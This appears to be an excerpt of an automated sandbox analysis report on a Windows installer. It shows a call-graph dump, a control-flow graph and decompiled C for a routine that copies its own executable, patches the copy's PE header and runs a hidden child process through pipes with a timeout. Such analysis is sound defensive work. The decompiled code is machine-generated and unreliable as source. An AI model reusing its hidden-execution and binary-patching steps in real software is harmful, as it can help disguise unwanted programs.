4902->4903 4903->4880 4904 401939 4905 40193b 4904->4905 4906 402bbf 18 API calls 4905->4906 4907 401940 4906->4907 4910 405823 4907->4910 4950 405aee 4910->4950 4913 405862 4916 40598d 4913->4916 4964 406032 lstrcpynW 4913->4964 4914 40584b DeleteFileW 4915 401949 4914->4915 4916->4915 4923 406375 2 API calls 4916->4923 4918 405888 4919 40589b 4918->4919 4920 40588e lstrcatW 4918->4920 4965 405a32 lstrlenW 4919->4965 4921 4058a1 4920->4921 4924 4058b1 lstrcatW 4921->4924 4925 4058a7 4921->4925 4926 4059a7 4923->4926 4927 4058bc lstrlenW FindFirstFileW 4924->4927 4925->4924 4925->4927 4926->4915 4928 4059ab 4926->4928 4929 405982 4927->4929 4946 4058de 4927->4946 4930 4059e6 3 API calls 4928->4930 4929->4916 4931 4059b1 4930->4931 4934 4057db 5 API calls 4931->4934 4933 405965 FindNextFileW 4936 40597b FindClose 4933->4936 4933->4946 4935 4059bd 4934->4935 4937 4059c1 4935->4937 4938 4059d7 4935->4938 4936->4929 4937->4915 4941 405191 25 API calls 4937->4941 4940 405191 25 API calls 4938->4940 4940->4915 4943 4059ce 4941->4943 4942 405823 62 API calls 4942->4946 4945 405ed3 38 API calls 4943->4945 4944 405191 25 API calls 4944->4933 4947 4059d5 4945->4947 4946->4933 4946->4942 4946->4944 4948 405191 25 API calls 4946->4948 4949 405ed3 38 API calls 4946->4949 4969 406032 lstrcpynW 4946->4969 4970 4057db 4946->4970 4947->4915 4948->4946 4949->4946 4978 406032 lstrcpynW 4950->4978 4952 405aff 4953 405a91 4 API calls 4952->4953 4954 405b05 4953->4954 4955 405843 4954->4955 4956 4062c6 5 API calls 4954->4956 4955->4913 4955->4914 4962 405b15 4956->4962 4957 405b46 lstrlenW 4958 405b51 4957->4958 4957->4962 4960 4059e6 3 API calls 4958->4960 4959 406375 2 API calls 4959->4962 4961 405b56 GetFileAttributesW 4960->4961 4961->4955 4962->4955 4962->4957 4962->4959 4963 405a32 2 API calls 4962->4963 4963->4957 4964->4918 4966 405a40 4965->4966 4967 405a52 4966->4967 4968 405a46 CharPrevW 4966->4968 4967->4921 4968->4966 4968->4967 4969->4946 4971 405be2 2 API calls 4970->4971 4972 4057e7 4971->4972 4973 4057f6 RemoveDirectoryW 4972->4973 4974 4057fe DeleteFileW 4972->4974 4975 405808 4972->4975 4976 405804 4973->4976 4974->4976 4975->4946 4976->4975 4977 405814 SetFileAttributesW 4976->4977 4977->4975 4978->4952 5858 403839 5859 403844 5858->5859 5860 403848 5859->5860 5861 40384b GlobalAlloc 5859->5861 5861->5860 5862 40293b 5863 402ba2 18 API calls 5862->5863 5864 402941 5863->5864 5865 402964 5864->5865 5866 40297d 5864->5866 5874 40281e 5864->5874 5867 402969 5865->5867 5873 40297a 5865->5873 5868 402993 5866->5868 5869 402987 5866->5869 5876 406032 lstrcpynW 5867->5876 5871 406054 18 API calls 5868->5871 5870 402ba2 18 API calls 5869->5870 5870->5874 5871->5874 5877 405f79 wsprintfW 5873->5877 5876->5874 5877->5874 5878 7e1000 5879 7e1112 82 API calls 5878->5879 5880 7e102b 5879->5880 5881 10002a7f 5882 10002a97 5881->5882 5883 1000158f 2 API calls 5882->5883 5884 10002ab2 5883->5884

                                                Executed Functions

                                                Function 007E1112 Relevance: 133.6, APIs: 65, Strings: 11, Instructions: 582stringfilememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7e1112-7e1141 call 7e1096 3 7e128c-7e12a8 GlobalAlloc 0->3 4 7e1147-7e118b GetModuleFileNameW GlobalAlloc 0->4 5 7e12aa-7e12c0 3->5 6 7e118e-7e1192 4->6 7 7e12e4-7e12f9 call 7e1a33 call 7e1849 5->7 8 7e12c2-7e12df FindWindowExW * 2 5->8 9 7e11ae-7e11b6 6->9 10 7e1194-7e11ac CharPrevW 6->10 24 7e130a-7e1318 7->24 25 7e12fb-7e1308 call 7e18af 7->25 8->7 12 7e11ce-7e1201 GetTempFileNameW CopyFileW 9->12 13 7e11b8-7e11bd call 7e1a73 9->13 10->6 10->9 15 7e126d-7e128a lstrcatW lstrlenW 12->15 16 7e1203-7e1237 CreateFileW CreateFileMappingW MapViewOfFile 12->16 18 7e11c2-7e11c9 GlobalFree 13->18 15->5 19 7e125f-7e126b CloseHandle * 2 16->19 20 7e1239-7e1259 UnmapViewOfFile 16->20 22 7e17d8-7e17dc 18->22 19->15 20->19 30 7e131a 24->30 31 7e1326-7e1329 24->31 29 7e1321-7e1324 25->29 29->7 30->29 32 7e132b-7e133a call 7e1a73 31->32 33 7e1357-7e13c8 GetVersion 31->33 45 7e133c 32->45 46 7e1340-7e1343 32->46 35 7e13fc-7e1404 33->35 36 7e13ca-7e13ce 33->36 39 7e1406-7e1421 InitializeSecurityDescriptor SetSecurityDescriptorDacl 35->39 40 7e1424-7e143b CreatePipe 35->40 37 7e13d9 36->37 38 7e13d0-7e13d7 36->38 42 7e13de-7e13ec GlobalAlloc 37->42 38->42 39->40 43 7e16f8-7e1704 lstrcpyW 40->43 44 7e1441-7e1452 CreatePipe 40->44 42->43 47 7e13f2-7e13f9 GlobalLock 42->47 48 7e170a-7e170e 43->48 44->43 49 7e1458-7e14a0 GetStartupInfoW CreateProcessW 44->49 45->46 46->18 50 7e1349-7e1352 DeleteFileW 46->50 47->35 51 7e1718-7e171c 48->51 52 7e1710-7e1713 call 7e1a73 48->52 49->43 53 7e14a6-7e14ac GetTickCount 49->53 50->18 56 7e171e-7e1724 51->56 57 7e1731-7e1738 51->57 52->51 55 7e14af-7e14b7 53->55 60 7e14b9-7e14bc 55->60 61 7e14c2-7e14d6 PeekNamedPipe 55->61 56->57 62 7e1726-7e1730 call 7e17dd 56->62 58 7e174c-7e1753 57->58 59 7e173a-7e1746 lstrcpyW 57->59 63 7e176d-7e17a6 call 7e1a73 CloseHandle * 6 58->63 64 7e1755-7e176a wsprintfW 58->64 59->58 60->48 60->61 65 7e14dc-7e150f GetTickCount ReadFile call 7e10d3 61->65 66 7e168b-7e1690 61->66 62->57 78 7e17ac-7e17af 63->78 79 7e17a8 63->79 64->63 76 7e1514-7e151a 65->76 68 7e1692-7e169f GetTickCount 66->68 69 7e16c0-7e16c2 Sleep 66->69 68->69 73 7e16a1-7e16be TerminateProcess lstrcpyW 68->73 74 7e16c8-7e16f3 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 69->74 73->74 74->55 76->74 77 7e1520-7e152f lstrlenW 76->77 80 7e1550-7e156b lstrlenW GlobalSize 77->80 81 7e1531-7e154b lstrlenW lstrcpynW 77->81 82 7e17ba-7e17c8 GlobalFree 78->82 83 7e17b1-7e17b4 DeleteFileW 78->83 79->78 84 7e159e-7e15b0 lstrcatW EnumDisplaySettingsA 80->84 85 7e156d-7e158e GlobalUnlock GlobalReAlloc 80->85 81->74 82->22 86 7e17ca-7e17d6 GlobalUnlock GlobalFree 82->86 83->82 88 7e15b2-7e15c9 GlobalSize 84->88 85->43 87 7e1594-7e159b GlobalLock 85->87 86->22 87->84 89 7e15cb-7e15d2 88->89 90 7e15d4-7e15e4 lstrlenW 88->90 91 7e1607-7e1618 call 7e1849 89->91 92 7e15e6-7e15f1 90->92 93 7e15f3-7e1602 lstrcpyW 90->93 91->88 97 7e161a-7e1622 91->97 92->92 92->93 93->91 97->74 98 7e1628-7e162f 97->98 99 7e1638-7e163c 98->99 100 7e1631-7e1636 98->100 102 7e163e-7e1641 99->102 103 7e165f-7e1666 CharNextW 99->103 101 7e1668-7e166b 100->101 101->98 105 7e166d-7e1670 101->105 104 7e1649-7e164c 102->104 103->101 106 7e164e-7e165d call 7e17dd 104->106 107 7e1643-7e1645 104->107 105->74 108 7e1672-7e1675 105->108 106->101 107->106 109 7e1647-7e1648 107->109 111 7e167e-7e1684 108->111 109->104 112 7e1686-7e1689 111->112 113 7e1677-7e167d 111->113 112->74 113->111
                                                C-Code - Quality: 88%
                                                			E007E1112(void* __eflags, signed int _a4) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				long _v20;
				WCHAR* _v24;
				void* _v28;
				long _v32;
				void* _v36;
				void* _v40;
				long _v44;
				void* _v48;
				struct _OVERLAPPED* _v52;
				struct _OVERLAPPED* _v56;
				long _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES _v76;
				struct _PROCESS_INFORMATION _v92;
				void* _v111;
				struct _SECURITY_DESCRIPTOR _v112;
				struct _STARTUPINFOW _v180;
				void _v434;
				short _v436;
				short _v956;
				short _t177;
				intOrPtr _t181;
				void* _t183;
				struct HWND__* _t184;
				void* _t186;
				int _t196;
				void* _t207;
				void* _t208;
				void* _t225;
				int _t228;
				int _t246;
				long _t248;
				unsigned int _t251;
				signed int _t254;
				short _t256;
				struct _OVERLAPPED* _t258;
				void* _t262;
				long _t272;
				void* _t273;
				intOrPtr _t275;
				struct _OVERLAPPED* _t281;
				struct HWND__* _t282;
				struct HWND__* _t283;
				long _t285;
				intOrPtr _t286;
				void* _t298;
				void* _t300;
				struct _OVERLAPPED* _t308;
				signed int _t309;
				signed int _t312;
				intOrPtr _t326;
				struct _OVERLAPPED** _t328;
				WCHAR* _t333;
				WCHAR* _t339;
				signed int _t345;
				void* _t349;
				WCHAR* _t350;
				short* _t351;
				WCHAR* _t353;
				signed int _t358;
				short* _t359;
				short* _t360;
				void* _t362;
				void* _t364;
				struct _OVERLAPPED* _t370;
				WCHAR* _t371;
				WCHAR* _t375;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t380;

				_t177 =  *0x7e3cb8; // 0x0
				_v436 = _t177;
				_t309 = 0x3f;
				memset( &_v434, 0, _t309 << 2);
				_t379 = _t378 + 0xc;
				_t310 = 0;
				asm("stosw");
				if(E007E1096(0) != 0) {
					_t181 =  *0x7e3cc8; // 0x400
					_t308 = 0;
					_v16 = 0;
					_t183 = GlobalAlloc(0x40, _t181 + _t181 + 2);
					_v24 = _t183;
					_t339 = _t183;
					_t364 = _t183;
					goto L13;
				} else {
					_t285 = GetModuleFileNameW( *0x7e3cbc,  &_v956, 0x104);
					_t286 =  *0x7e3cc8; // 0x400
					_t358 = _t285 + 2;
					_t364 = GlobalAlloc(0x40, _t286 + _t358 + _t286 + _t358 + 4);
					_t359 = _t377 + _t358 * 2 - 0x3bc;
					_v24 = _t364;
					_t11 = _t364 + 2; // 0x2
					 *_t364 = 0x22;
					_v16 = _t11;
					while( *_t359 != 0x5c) {
						_push(_t359);
						_push( &_v956);
						_t359 = CharPrevW();
						if(_t359 >  &_v956) {
							continue;
						}
						break;
					}
					if(_t359 !=  &_v956) {
						_t308 = 0;
						 *_t359 = 0;
						GetTempFileNameW( &_v956, L"ns", 0, _v16);
						 *_t359 = 0x5c;
						if(CopyFileW( &_v956, _v16, 0) == 0) {
							L11:
							lstrcatW(_t364, "\"");
							_t360 = _t364 + lstrlenW(_t364) * 2;
							 *_t360 = 0x20;
							_t339 = _t360 + 2;
							L13:
							_t184 =  *0x7e3cc4; // 0x602c2
							_v36 = _t339;
							_v56 = _t308;
							_v52 = _t308;
							 *0x7e3cc0 = _t308;
							if(_t184 != _t308) {
								_t282 = FindWindowExW(_t184, _t308, L"#32770", _t308); // executed
								_t283 = FindWindowExW(_t282, _t308, L"SysListView32", _t308); // executed
								_t364 = _v24;
								 *0x7e3cc0 = _t283;
							}
							while(1) {
								E007E1A33(_t339);
								_t186 = E007E1849(_t310, _t339, L"/TIMEOUT=");
								_pop(_t310);
								if(_t186 != _t339) {
									goto L17;
								}
								_t37 =  &(_t339[9]); // 0x12
								_t281 = E007E18AF(_t37);
								_pop(_t310);
								_v56 = _t281;
								L19:
								 *_t339 = _t308;
								continue;
								L17:
								if(lstrcmpiW(_t339, L"/OEM") != 0) {
									if( *_t339 != _t308) {
										_t312 = 0x10;
										_v180.cb = 0x44;
										_v76.nLength = 0xc;
										memset( &(_v180.lpReserved), 0, _t312 << 2);
										_t380 = _t379 + 0xc;
										_v112.Revision = _t308;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosw");
										asm("stosb");
										_v92.hProcess = _t308;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										GetVersion();
										_v40 = _t308;
										asm("sbb edi, edi");
										_t345 =  ~( &(_v92.hThread));
										_v28 = _t308;
										_v48 = _t308;
										_v64 = _t308;
										_v20 = 1;
										_v44 = _t308;
										_v32 = 0x102;
										_v12 = _t308;
										_v8 = _t308;
										if(_a4 == _t308) {
											L31:
											_v76.bInheritHandle = 1;
											_v76.lpSecurityDescriptor = _t308;
											if(_t345 != _t308) {
												InitializeSecurityDescriptor( &_v112, 1);
												SetSecurityDescriptorDacl( &_v112, 1, _t308, _t308);
												_v76.lpSecurityDescriptor =  &_v112;
											}
											_t196 = CreatePipe( &_v28,  &_v40,  &_v76, _t308); // executed
											if(_t196 == 0 || CreatePipe( &_v64,  &_v48,  &_v76, _t308) == 0) {
												L75:
												lstrcpyW( &_v436, L"error");
												goto L76;
											} else {
												GetStartupInfoW( &_v180);
												_v180.dwFlags = 0x101;
												_v180.hStdInput = _v48;
												_t225 = _v40;
												_v180.hStdOutput = _t225;
												_v180.hStdError = _t225;
												_v180.wShowWindow = _t308;
												_t228 = CreateProcessW(_t308, _v24, _t308, _t308, 1, 0x10, _t308, _t308,  &_v180,  &_v92); // executed
												if(_t228 == 0) {
													goto L75;
												}
												_v60 = GetTickCount();
												while(_v32 != _t308 || _v20 != _t308) {
													PeekNamedPipe(_v28, _t308, _t308, _t308,  &_v20, _t308); // executed
													if(_v20 == _t308) {
														_t370 = _v56;
														if(_t370 == _t308 || GetTickCount() <= _v60 + _t370) {
															Sleep(0x64); // executed
														} else {
															TerminateProcess(_v92.hProcess, 0xffffffff);
															lstrcpyW( &_v436, L"timeout");
														}
														L74:
														_v32 = WaitForSingleObject(_v92.hProcess, _t308);
														GetExitCodeProcess(_v92.hProcess,  &_v44); // executed
														PeekNamedPipe(_v28, _t308, _t308, _t308,  &_v20, _t308); // executed
														continue;
													}
													_v60 = GetTickCount();
													ReadFile(_v28, "740976928\r\n", 0x3ff,  &_v20, _t308); // executed
													 *("740976928\r\n" + _v20) = _t308;
													E007E10D3("740976928\r\n", _v20, 0x7e34b8, 0x400);
													_t380 = _t380 + 0x10;
													if(_a4 == _t308) {
														goto L74;
													}
													_t246 = lstrlenW(_v8);
													if((_a4 & 0x00000002) == 0) {
														_v32 = _t246;
														_t114 = 1 + lstrlenW(0x7e34b8); // 0x103
														_t349 = _v32 + _t114;
														_t248 = GlobalSize(_v12);
														_t318 = _t349 + _t349;
														if(_t248 >= _t349 + _t349) {
															L46:
															lstrcatW(_v8, 0x7e34b8);
															_push("\t");
															_push(_v8);
															while(1) {
																_t350 = E007E1849(_t318);
																if(_t350 == _t308) {
																	break;
																}
																_t251 = GlobalSize(_v12);
																_t318 = _t350 - _v8 >> 1;
																if(_t350 - _v8 >> 1 <= (_t251 >> 1) - 0x12) {
																	_t254 = lstrlenW(_t350);
																	_t127 = _t254 * 2; // 0x22
																	_t318 = _t350 + _t127 + 0x22;
																	_t333 =  &(_t350[_t254]);
																	if(_t254 <= _t308) {
																		L51:
																		lstrcpyW(_t350, L"        ");
																		_t351 =  &(_t350[0x11]);
																		 *_t351 = 0x20;
																		L52:
																		_push("\t");
																		_push(_t351);
																		continue;
																	} else {
																		goto L50;
																	}
																	do {
																		L50:
																		 *_t318 =  *_t333;
																		_t318 = _t318;
																		_t333 = _t333;
																		_t254 = _t254 - 1;
																	} while (_t254 != 0);
																	goto L51;
																}
																 *_t350 = 0x20;
																_t351 =  &(_t350[1]);
																goto L52;
															}
															_t371 = _v8;
															_t353 = _t371;
															if( *_t371 == _t308) {
																goto L74;
															} else {
																goto L55;
															}
															do {
																L55:
																_t256 =  *_t371;
																if(_t256 != 0xd) {
																	if(_t256 != 0xa) {
																		_t371 = CharNextW(_t371);
																		goto L64;
																	}
																	 *_t371 = _t308;
																	while( *_t353 == _t308) {
																		if(_t353 == _t371) {
																			break;
																		}
																		_t353 =  &(_t353[1]);
																	}
																	_push(_v52);
																	E007E17DD(_t353);
																	_t371 =  &(_t371[1]);
																	_t353 = _t371;
																	goto L64;
																}
																 *_t371 = _t308;
																_t371 =  &(_t371[1]);
																L64:
															} while ( *_t371 != _t308);
															if(_t353 == _v8) {
																goto L74;
															}
															_t328 = _v8;
															while(1) {
																_t258 =  *_t353;
																if(_t258 == _t308) {
																	break;
																}
																 *_t328 = _t258;
																_t328 =  &(_t328[0]);
																_t353 =  &(_t353[1]);
															}
															 *_t328 = _t308;
															goto L74;
														}
														GlobalUnlock(_v12);
														_t118 = _t349 + 0x800; // 0x903
														_t262 = GlobalReAlloc(_v12, _t349 + _t118, 0x42);
														_v12 = _t262;
														if(_t262 == _t308) {
															goto L75;
														}
														_v8 = GlobalLock(_t262);
														goto L46;
													}
													_t326 =  *0x7e3cc8; // 0x400
													_t375 = _v8;
													lstrcpynW( &(_t375[lstrlenW(_t375)]), 0x7e34b8, _t326 - _t246);
													goto L74;
												}
												L76:
												if((_a4 & 0x00000002) != 0) {
													E007E1A73(_v8);
												}
												if((_a4 & 0x00000001) != 0) {
													_t216 = _v8;
													if( *_v8 != _t308) {
														_push(_v52);
														E007E17DD(_t216);
													}
												}
												if(_v44 == 0xc000001d) {
													lstrcpyW( &_v436, L"error");
												}
												if(_v436 == _t308) {
													wsprintfW( &_v436, L"%d", _v44);
												}
												E007E1A73( &_v436);
												CloseHandle(_v92.hThread);
												CloseHandle(_v92);
												CloseHandle(_v40);
												CloseHandle(_v28);
												CloseHandle(_v48);
												CloseHandle(_v64);
												_t207 = _v36;
												if(_t207 - 4 >= _v24) {
													 *(_t207 - 4) = _t308;
												}
												if(_v16 != _t308) {
													DeleteFileW(_v16);
												}
												_t208 = GlobalFree(_v24);
												if(_a4 == _t308) {
													return _t208;
												} else {
													GlobalUnlock(_v12);
													return GlobalFree(_v12);
												}
											}
										}
										if((_a4 & 0x00000002) == 0) {
											_t272 = 0x2000;
										} else {
											_t275 =  *0x7e3cc8; // 0x400
											_t272 = _t275 + _t275;
										}
										_t273 = GlobalAlloc(0x42, _t272);
										_v12 = _t273;
										if(_t273 == _t308) {
											goto L75;
										} else {
											_v8 = GlobalLock(_t273);
											goto L31;
										}
									}
									E007E1A73(L"error");
									_t40 = _t339 - 4; // -4
									if(_t40 >= _t364) {
										 *(_t339 - 4) = _t308;
									}
									if(_v16 != _t308) {
										DeleteFileW(_v16);
									}
									goto L6;
								}
								_v52 = 1;
								goto L19;
							}
						}
						_t298 = CreateFileW(_v16, 0xc0000000, 0, 0, 3, 0, 0);
						_v36 = _t298;
						_t362 = CreateFileMappingW(_t298, 0, 4, 0, 0, 0);
						_t300 = MapViewOfFile(_t362, 2, 0, 0, 0);
						if(_t300 != 0) {
							_t310 =  *((intOrPtr*)(_t300 + 0x3c)) + _t300;
							 *((short*)(_t310 + 0x16)) = 0x10e;
							 *((short*)(_t310 + 0x5c)) = 3;
							 *((intOrPtr*)(_t310 + 0x28)) = E007E194F -  *0x7e3cbc;
							UnmapViewOfFile(_t300);
						}
						CloseHandle(_t362);
						CloseHandle(_v36);
						goto L11;
					} else {
						E007E1A73(L"error");
						L6:
						return GlobalFree(_t364);
					}
				}
			}













































































                                                0x007e111b
                                                0x007e1126
                                                0x007e112d
                                                0x007e1136
                                                0x007e1136
                                                0x007e1136
                                                0x007e1138
                                                0x007e1141
                                                0x007e128c
                                                0x007e1291
                                                0x007e1293
                                                0x007e129d
                                                0x007e12a3
                                                0x007e12a6
                                                0x007e12a8
                                                0x00000000
                                                0x007e1147
                                                0x007e1159
                                                0x007e1161
                                                0x007e1167
                                                0x007e1177
                                                0x007e1179
                                                0x007e1180
                                                0x007e1183
                                                0x007e1186
                                                0x007e118b
                                                0x007e118e
                                                0x007e119a
                                                0x007e119b
                                                0x007e11a2
                                                0x007e11ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x007e11ac
                                                0x007e11b6
                                                0x007e11d1
                                                0x007e11d9
                                                0x007e11e3
                                                0x007e11f3
                                                0x007e1201
                                                0x007e126d
                                                0x007e1273
                                                0x007e1280
                                                0x007e1283
                                                0x007e1289
                                                0x007e12aa
                                                0x007e12aa
                                                0x007e12af
                                                0x007e12b4
                                                0x007e12b7
                                                0x007e12ba
                                                0x007e12c0
                                                0x007e12d7
                                                0x007e12da
                                                0x007e12dc
                                                0x007e12df
                                                0x007e12df
                                                0x007e12e4
                                                0x007e12e5
                                                0x007e12f0
                                                0x007e12f8
                                                0x007e12f9
                                                0x00000000
                                                0x00000000
                                                0x007e12fb
                                                0x007e12ff
                                                0x007e1304
                                                0x007e1305
                                                0x007e1321
                                                0x007e1321
                                                0x00000000
                                                0x007e130a
                                                0x007e1318
                                                0x007e1329
                                                0x007e135b
                                                0x007e1362
                                                0x007e136c
                                                0x007e1373
                                                0x007e1373
                                                0x007e1378
                                                0x007e137b
                                                0x007e137c
                                                0x007e1382
                                                0x007e1383
                                                0x007e1384
                                                0x007e1385
                                                0x007e1386
                                                0x007e1388
                                                0x007e138e
                                                0x007e1391
                                                0x007e1392
                                                0x007e1393
                                                0x007e1394
                                                0x007e139f
                                                0x007e13a2
                                                0x007e13a6
                                                0x007e13ac
                                                0x007e13af
                                                0x007e13b2
                                                0x007e13b5
                                                0x007e13b8
                                                0x007e13bb
                                                0x007e13c2
                                                0x007e13c5
                                                0x007e13c8
                                                0x007e13fc
                                                0x007e13fe
                                                0x007e1401
                                                0x007e1404
                                                0x007e140b
                                                0x007e1418
                                                0x007e1421
                                                0x007e1421
                                                0x007e1437
                                                0x007e143b
                                                0x007e16f8
                                                0x007e1704
                                                0x00000000
                                                0x007e1458
                                                0x007e145f
                                                0x007e1468
                                                0x007e1472
                                                0x007e1475
                                                0x007e1478
                                                0x007e147b
                                                0x007e1481
                                                0x007e1498
                                                0x007e14a0
                                                0x00000000
                                                0x00000000
                                                0x007e14ac
                                                0x007e14af
                                                0x007e14cd
                                                0x007e14d6
                                                0x007e168b
                                                0x007e1690
                                                0x007e16c2
                                                0x007e16a1
                                                0x007e16a6
                                                0x007e16b8
                                                0x007e16b8
                                                0x007e16c8
                                                0x007e16d2
                                                0x007e16dc
                                                0x007e16ed
                                                0x00000000
                                                0x007e16ed
                                                0x007e14e2
                                                0x007e14f8
                                                0x007e1509
                                                0x007e150f
                                                0x007e1514
                                                0x007e151a
                                                0x00000000
                                                0x00000000
                                                0x007e1529
                                                0x007e152f
                                                0x007e1551
                                                0x007e155c
                                                0x007e155c
                                                0x007e1560
                                                0x007e1566
                                                0x007e156b
                                                0x007e159e
                                                0x007e15a2
                                                0x007e15a8
                                                0x007e15ad
                                                0x007e160d
                                                0x007e1612
                                                0x007e1618
                                                0x00000000
                                                0x00000000
                                                0x007e15b5
                                                0x007e15c5
                                                0x007e15c9
                                                0x007e15d5
                                                0x007e15dd
                                                0x007e15dd
                                                0x007e15e1
                                                0x007e15e4
                                                0x007e15f3
                                                0x007e15f9
                                                0x007e15ff
                                                0x007e1602
                                                0x007e1607
                                                0x007e1607
                                                0x007e160c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x007e15e6
                                                0x007e15e6
                                                0x007e15e9
                                                0x007e15ed
                                                0x007e15ef
                                                0x007e15f0
                                                0x007e15f0
                                                0x00000000
                                                0x007e15e6
                                                0x007e15cb
                                                0x007e15d1
                                                0x00000000
                                                0x007e15d1
                                                0x007e161a
                                                0x007e161d
                                                0x007e1622
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x007e1628
                                                0x007e1628
                                                0x007e1628
                                                0x007e162f
                                                0x007e163c
                                                0x007e1666
                                                0x00000000
                                                0x007e1666
                                                0x007e163e
                                                0x007e1649
                                                0x007e1645
                                                0x00000000
                                                0x00000000
                                                0x007e1648
                                                0x007e1648
                                                0x007e164e
                                                0x007e1652
                                                0x007e1659
                                                0x007e165b
                                                0x00000000
                                                0x007e165b
                                                0x007e1631
                                                0x007e1635
                                                0x007e1668
                                                0x007e1668
                                                0x007e1670
                                                0x00000000
                                                0x00000000
                                                0x007e1672
                                                0x007e167e
                                                0x007e167e
                                                0x007e1684
                                                0x00000000
                                                0x00000000
                                                0x007e1677
                                                0x007e167b
                                                0x007e167d
                                                0x007e167d
                                                0x007e1686
                                                0x00000000
                                                0x007e1686
                                                0x007e1570
                                                0x007e1576
                                                0x007e1583
                                                0x007e158b
                                                0x007e158e
                                                0x00000000
                                                0x00000000
                                                0x007e159b
                                                0x00000000
                                                0x007e159b
                                                0x007e1531
                                                0x007e153b
                                                0x007e1545
                                                0x00000000
                                                0x007e1545
                                                0x007e170a
                                                0x007e170e
                                                0x007e1713
                                                0x007e1713
                                                0x007e171c
                                                0x007e171e
                                                0x007e1724
                                                0x007e1726
                                                0x007e172a
                                                0x007e1730
                                                0x007e1724
                                                0x007e1738
                                                0x007e1746
                                                0x007e1746
                                                0x007e1753
                                                0x007e1764
                                                0x007e176a
                                                0x007e1774
                                                0x007e1782
                                                0x007e1787
                                                0x007e178c
                                                0x007e1791
                                                0x007e1796
                                                0x007e179b
                                                0x007e179d
                                                0x007e17a6
                                                0x007e17a8
                                                0x007e17a8
                                                0x007e17af
                                                0x007e17b4
                                                0x007e17b4
                                                0x007e17c3
                                                0x007e17c8
                                                0x007e17dc
                                                0x007e17ca
                                                0x007e17cd
                                                0x00000000
                                                0x007e17d6
                                                0x007e17c8
                                                0x007e143b
                                                0x007e13ce
                                                0x007e13d9
                                                0x007e13d0
                                                0x007e13d0
                                                0x007e13d5
                                                0x007e13d5
                                                0x007e13e1
                                                0x007e13e9
                                                0x007e13ec
                                                0x00000000
                                                0x007e13f2
                                                0x007e13f9
                                                0x00000000
                                                0x007e13f9
                                                0x007e13ec
                                                0x007e1330
                                                0x007e1335
                                                0x007e133a
                                                0x007e133c
                                                0x007e133c
                                                0x007e1343
                                                0x007e134c
                                                0x007e134c
                                                0x00000000
                                                0x007e1343
                                                0x007e131a
                                                0x00000000
                                                0x007e131a
                                                0x007e12e4
                                                0x007e1211
                                                0x007e121e
                                                0x007e1229
                                                0x007e122f
                                                0x007e1237
                                                0x007e1241
                                                0x007e1244
                                                0x007e124a
                                                0x007e1256
                                                0x007e1259
                                                0x007e1259
                                                0x007e1266
                                                0x007e126b
                                                0x00000000
                                                0x007e11b8
                                                0x007e11bd
                                                0x007e11c2
                                                0x00000000
                                                0x007e11c3
                                                0x007e11b6

                                                APIs
                                                  • Part of subcall function 007E1096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,007E113F), ref: 007E10A5
                                                  • Part of subcall function 007E1096: GetProcAddress.KERNEL32(00000000), ref: 007E10AC
                                                  • Part of subcall function 007E1096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,007E113F), ref: 007E10BC
                                                • GetModuleFileNameW.KERNEL32(?,00000104), ref: 007E1159
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E1171
                                                • CharPrevW.USER32(?,?), ref: 007E119C
                                                • GlobalFree.KERNEL32 ref: 007E11C3
                                                • GetTempFileNameW.KERNEL32(?,007E30A4,00000000,?), ref: 007E11E3
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 007E11F9
                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 007E1211
                                                • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 007E1221
                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 007E122F
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 007E1259
                                                • CloseHandle.KERNEL32(00000000), ref: 007E1266
                                                • CloseHandle.KERNEL32(?), ref: 007E126B
                                                • lstrcatW.KERNEL32(00000000,007E30A0), ref: 007E1273
                                                • lstrlenW.KERNEL32(00000000), ref: 007E127A
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E129D
                                                • FindWindowExW.USER32(000602C2,00000000,#32770,00000000), ref: 007E12D7
                                                • FindWindowExW.USER32(00000000), ref: 007E12DA
                                                • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 007E1310
                                                • DeleteFileW.KERNEL32(?,error), ref: 007E134C
                                                • GetVersion.KERNEL32 ref: 007E1394
                                                • GlobalAlloc.KERNEL32(00000042,00002000), ref: 007E13E1
                                                • GlobalLock.KERNEL32 ref: 007E13F3
                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007E140B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 007E1418
                                                • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 007E1437
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007E144E
                                                • GetStartupInfoW.KERNEL32(00000044), ref: 007E145F
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 007E1498
                                                • GetTickCount.KERNEL32 ref: 007E14A6
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007E14CD
                                                • GetTickCount.KERNEL32 ref: 007E14DC
                                                • ReadFile.KERNELBASE(?,740976928,000003FF,?,00000000), ref: 007E14F8
                                                • lstrlenW.KERNEL32(?), ref: 007E1529
                                                • lstrlenW.KERNEL32(?,740976928,00000400), ref: 007E153F
                                                • lstrcpynW.KERNEL32(00000000), ref: 007E1545
                                                • lstrlenW.KERNEL32(740976928), ref: 007E1554
                                                • GlobalSize.KERNEL32(00000002), ref: 007E1560
                                                • GlobalUnlock.KERNEL32(00000002), ref: 007E1570
